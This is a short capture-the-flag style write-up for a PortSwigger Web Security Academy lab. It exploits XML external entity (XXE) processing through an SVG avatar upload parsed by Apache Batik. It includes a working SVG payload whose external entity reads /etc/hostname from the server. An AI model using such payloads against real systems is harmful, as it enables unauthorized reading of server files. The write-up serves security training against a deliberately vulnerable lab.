# Lab: Exploiting XXE via image file upload ###### tags: `Portswigger Web Security Academy` `Web` * Description: This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files. * Goal: To solve the lab, upload an image that displays the contents of the `/etc/hostname` file after processing. Then use the "Submit solution" button to submit the value of the server hostname. ## Recon In this lab, we can upload an exploited file which contained malicious xml data. Then we can fetch some sensitive information. ## Exp - Upload Exploited File as Avatar 1. Create an exploit text file We can create a text file contained the payload below The exploited payload in `.svg` files: ```xml! <?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns ="http://www.w3.org/2000/svg" xmlns:xlink ="http://www.w3.org/1999/xlink" version="1.1"><text fontsize="16" x="0" y="16">&xxe;</text></svg> ``` 2. Transfer to `svg` file and upload it After transfering to `.svg` file, we can choose arbitrary post and leave a comment below  3. Check your avatar Then you get back to post page and verified your avatar photo should contain a string which is your flag(sensitive data) that you must submit. :::spoiler Success Screenshot  :::